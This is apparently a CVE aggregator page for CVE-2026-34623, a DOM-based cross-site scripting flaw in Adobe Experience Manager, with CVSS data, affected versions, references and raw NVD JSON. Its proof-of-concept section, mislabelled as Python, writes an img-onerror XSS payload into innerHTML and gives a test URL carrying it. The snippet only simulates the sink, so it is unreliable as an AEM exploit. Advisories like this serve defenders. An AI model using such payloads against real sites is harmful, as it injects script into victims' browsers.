CVE-2026-34623

Description

Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:* - VULNERABLE

Adobe Experience Manager <= 6.5.24

Adobe Experience Manager <= FP11.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-34623 (DOM-based XSS in Adobe Experience Manager)
 * Description: Demonstrates how a malicious payload in the URL hash
 *              could be executed if the application uses innerHTML unsafely.
 */

// Simulate the vulnerable scenario where user input from URL is reflected unsafely
function simulateVulnerability() {
    // In a real attack, this comes from document.location.hash
    var maliciousPayload = "<img src=x onerror=alert('CVE-2026-34623 - DOM XSS Executed')>";
    
    console.log("Executing PoC for CVE-2026-34623...");
    
    // Vulner Sink: Using innerHTML directly with untrusted data
    // This mimics the behavior in the vulnerable AEM version
    document.body.innerHTML = "Welcome to AEM: " + maliciousPayload;
}

// To test: Visit https://target-aem-site.com/vulnerable_page.html#<img src=x onerror=alert(1)>
simulateVulnerability();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34623
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34623
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34623/
[4] VulDB https://vuldb.com/cve/CVE-2026-34623
[5] https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34623", "sourceIdentifier": "[email protected]", "published": "2026-04-14T19:16:37.903", "lastModified": "2026-04-15T19:41:53.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndIncluding": "6.5.24.0", "matchCriteriaId": "5898EACB-FA50-4AED-9248-9D4FBFD558D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.11.8", "matchCriteriaId": "CE7B652E-C71C-42E0-950D-59CABCE683CE"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}